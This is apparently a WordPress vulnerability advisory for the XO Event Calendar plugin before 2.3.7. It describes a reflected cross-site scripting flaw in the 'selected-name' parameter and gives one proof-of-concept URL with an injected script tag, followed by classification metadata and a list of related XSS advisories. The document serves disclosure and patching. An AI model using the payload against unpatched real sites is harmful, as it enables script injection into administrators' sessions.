WordPress Plugin Vulnerabilities

XO Event Calendar < 2.3.7 - Reflected Cross-Site Scripting

Description

The plugin does not escape the selected-name parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/edit.php?post_type=xo_event&page=xo-event-holiday-settings&selected-name="><script>alert(/XSS/)</script>

Affects Plugins

Plugin icon
xo-event-calendar
Fixed in 2.3.7

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
92562c6c-94a4-427d-97dc-7f5ffddcb6d8

Timeline

Publicly Published
2021-09-01 (about 2 years ago)
Added
2021-09-01 (about 2 years ago)
Last Updated
2021-09-01 (about 2 years ago)

Other

Published
Title
Published
2015-08-10
Title
The Holiday Calendar <= 1.11.2 - Cross-Site Scripting (XSS)
Published
2024-02-27
Title
Custom fields shortcode <= 0.1 - Authenticated(Contributor+) Stored Cross-Site Scripting via shortcode
Published
2023-01-18
Title
Youtube Channel Gallery <= 2.4 - Contributor+ Stored XSS via Shortcode
Published
2014-08-01
Title
ABC Test - "id" Cross-Site Scripting
Published
2024-05-14
Title
Import and export users and customers < 1.26.7 - Authenticated (Administrator+) Stored Cross-Site Scripting